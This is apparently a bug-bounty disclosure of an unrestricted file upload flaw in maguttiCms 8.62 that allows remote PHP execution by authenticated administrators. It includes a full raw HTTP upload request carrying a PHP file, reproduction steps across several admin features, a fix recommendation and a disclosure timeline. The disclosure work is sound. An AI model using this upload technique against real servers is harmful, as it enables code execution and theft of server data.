Unrestricted Upload of File with Dangerous Type in marcoax/magutticms

Valid

Reported on

Oct 25th 2021


Description

RCE via 'upload file image or document' on maguttiCms 8.62 allows remote authenticated administrators to execute arbitrary PHP code

Proof of Concept

// PoC.req
POST /admin/api/uploadifiveSingle HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------289373597033088154093484704035
Content-Length: 1123
Origin: http://127.0.0.1:8000
Connection: close
Referer: http://127.0.0.1:8000/admin/edit/articles/2
Cookie: CRM-a065912273e9ce1828ca92e192338d12=hl8kmfm92bf9ducncp1qro5ibo; PHPSESSID=rooedmi2ipb8qpu8mie54h0g6r; install_f528764d624d=d7sr8hakotuhjg37mg4spnjghv; _hjid=2f0f1c3b-7bed-4258-933b-ff637ebfdec0; __hstc=19301799.95f1db85f7fcdf6d34a1f1b99da598b0.1634716071331.1634716071331.1634716071331.1; hubspotutk=95f1db85f7fcdf6d34a1f1b99da598b0; __hssrc=1; ajs_anonymous_id=7365ff25-af33-4fe1-9758-7e557b70493a; __utma=96992031.1997153298.1634716441.1634716441.1634716441.1; __utmc=96992031; __utmz=96992031.1634716441.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionid=356kck05s8r7pcu3pgonp32stq; XSRF-TOKEN=eyJpdiI6IjZuRlhoUWowM3lsNFBxSkN4MlduZ1E9PSIsInZhbHVlIjoia1VXUmZ3cmlyQ1NsRjlDK243VDhTZlphRkV0bW55K001Uk5QLytNY2p6TFdmZmw5a091K2s0OVE1aTk3VFRWUVM0Z2hWNFpURnRWU20wb1VKSUNkaGFQWmRyRTQyeDJFMGFVYXdZdlRialBuUW44MVJ2aWJXbGlFeVJOSWh4V0ciLCJtYWMiOiJjNTlmYmNmNjlkMGYxY2NjMzIxNjg1MGYxNjZiODEyOTQyMzZhZGVjNTdkOWI0OWRkMTRmMjZjZjcwMzUwYjI5IiwidGFnIjoiIn0%3D; magutticms_session=eyJpdiI6Im4wS0huUmJaZWVtb0Rxd2tPOEZPdnc9PSIsInZhbHVlIjoieE95SmNUL1dEcGk1SUMzeXpDVWcrS2tpN2tQN3NXL1ZhbzlnaEloNzlOUThIelJuSzVsekY5V2ZXWE9YS0lMZU5SdGdRcDhma2owWlNkRWpZdjZuVkZMd1E5NTFINUpUU1ZxWTNxUlZwQUwxajB6R2E4NkZaL1c3WWU0ZVc0R0EiLCJtYWMiOiIzNWQyNDg5ZDEyYmEzZGM3NDBlMTYwZDEzOGU0MzBlZTVhZmQzZDc3Njc0ZmI0MmQxM2U5Y2VmOWMzZjJiNDY3IiwidGFnIjoiIn0%3D
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------289373597033088154093484704035
Content-Disposition: form-data; name="Filedata"; filename="phpinfo.php"
Content-Type: text/php

<?php echo phpinfo(); ?>
-----------------------------289373597033088154093484704035
Content-Disposition: form-data; name="timestamp"

1451682058
-----------------------------289373597033088154093484704035
Content-Disposition: form-data; name="token"

4b9fe8f26d865150e4b26b2a839d4f2b
-----------------------------289373597033088154093484704035
Content-Disposition: form-data; name="Id"

2
-----------------------------289373597033088154093484704035
Content-Disposition: form-data; name="myImgType"


-----------------------------289373597033088154093484704035
Content-Disposition: form-data; name="model"

Article
-----------------------------289373597033088154093484704035
Content-Disposition: form-data; name="key"

doc
-----------------------------289373597033088154093484704035
Content-Disposition: form-data; name="_token"

ZvErjYb1Qmxp84MY7btjvjnYjryEFe8SuyEReMgo
-----------------------------289373597033088154093484704035--

Step to Reproduct

Login to panel

Pages

Goto Page choose to Create page

At Image or Document selection upload a file like phpinfo.php

OR

Choose to Edit one page

At tab Media choose a file like phpinfo.php

Access file with URL: https://domain/media/docs/xxxx-phpinfo.php or https://domain/media/image/xxxx-phpinfo.php

Slides

Goto Slides choose to Create slide

At Image selection upload a file like phpinfo.php

Access file with URL: https://domain/media/image/xxxx-phpinfo.php

News

Goto News choose to Create new

At Image File Manager selection upload a file like phpinfo.php

OR

At Document selection upload a file like phpinfo.php

Access file with URL: https://domain/media/docs/xxxx-phpinfo.php

How to find file name

Once saved the filenames are returned in the response or you can view them by viewing the source code in your browser

Note

Because all the features use the same image and document file handling functions mentioned above, I just Permalink where the vulnerability exists.

Impact

This vulnerability could potentially allow an attacker to gain access to a web server and steal sensitive content stored on the web server.

Recomendation

Perform a check of the allowed file formats, check file extension, check file type, ... before storing them on the server. Laravel provides several different approaches to validate your application's incoming data.

We created a GitHub Issue asking the maintainers to create a SECURITY.md a month ago
lethanhphuc modified their report
a month ago
We have contacted a member of the marcoax/magutticms team and are waiting to hear back a month ago
We have sent a follow up to the marcoax/magutticms team. We will try again in 7 days. a month ago
We have sent a second follow up to the marcoax/magutticms team. We will try again in 10 days. a month ago
marcoax validated this vulnerability a month ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
marcoax confirmed that a fix has been merged on 39b55d a month ago
The fix bounty has been dropped